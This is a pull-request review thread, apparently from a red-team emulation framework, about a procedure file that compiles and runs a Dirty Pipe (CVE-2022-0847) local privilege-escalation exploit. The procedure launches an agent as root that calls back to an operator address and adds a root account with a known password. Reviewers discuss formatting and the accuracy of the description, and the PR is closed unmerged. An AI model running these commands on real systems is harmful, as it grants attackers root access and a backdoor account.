### PR TITLE
Move DirtyPipe to PROD

### PR DESCRIPTION
**Pull request by khyberspache**

### CODE REVIEW

File: ttps/privilege-escalation/894a2682-9023-4956-b6fd-47200759bd2c.yml [hunk 1]
```diff
@@ -0,0 +1,25 @@
...
+  id: T1068
+ name: 'Exploitation for Privilege Escalation'
+platforms:
+  linux:
+    sh:
+      command: |-  
+        cp "./dirtypipe.c" /tmp/dirtypipe.c
+        gcc dirtypipe.c -o /tmp/dirtypipe
+        chmod +x /tmp/dirtypipe 
+        echo 'nohup #{agent.location} -address #{operator.tcp} -range elevated >/dev/null 2>&1 &' | /tmp/dirtypipe payload: '#{operator.payloads}/CVE-2022-0847/dirtypipe.c'
```
Comment (khyberspache) [inline ttps/privilege-escalation/894a2682-9023-4956-b6fd-47200759bd2c.yml:15]: payload is on the wrong line

File: ttps/privilege-escalation/894a2682-9023-4956-b6fd-47200759bd2c.yml [hunk 2]
```diff
@@ -0,0 +1,25 @@
...
+metadata:
+  authors:
+    - VVX7
+ chains:
+    - Dirty Pipe (CVE-2022-0847)
+ references:
+    - https://dirtypipe.cm4all.com/
+    - https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
+ tags:
+    - destructive
```
Comment (khyberspache) [inline ttps/privilege-escalation/894a2682-9023-4956-b6fd-47200759bd2c.yml:25]: spacing is wrong on these, it won't load into operator

File: ttps/privilege-escalation/894a2682-9023-4956-b6fd-47200759bd2c.yml [hunk 3]
```diff
@@ -0,0 +1,25 @@
+id: 894a2682-9023-4956-b6fd-47200759bd2c
+name: Spawn elevated Pneuma via CVE-2022-0847
+description: Compiles and executes a local privilege escalation exploit (CVE-2022-0847) to spawn a root shell and changes the root password to "operator".
```
Comment (khyberspache) [inline ttps/privilege-escalation/894a2682-9023-4956-b6fd-47200759bd2c.yml:3]: This description doesn't match what the TTP is doing

**Review by khyberspache — COMMENTED** [review]
@VVX7 some changes requested

File: ttps/privilege-escalation/894a2682-9023-4956-b6fd-47200759bd2c.yml (hunk 3 above)
Comment (VVX7) [reply ttps/privilege-escalation/894a2682-9023-4956-b6fd-47200759bd2c.yml:3]: Not sure what you mean? The exploit overwrites /etc/passwd to create a root user with password operator.

Comment (khyberspache) [reply ttps/privilege-escalation/894a2682-9023-4956-b6fd-47200759bd2c.yml:3]: the ttp itself appears to be launching a pneuma agent as root, versus just adding the account to passwd

Comment (VVX7) [reply ttps/privilege-escalation/894a2682-9023-4956-b6fd-47200759bd2c.yml:3]: exploit.c adds a new operator:operator user and then spawns a shell

**Pull request closed without merging**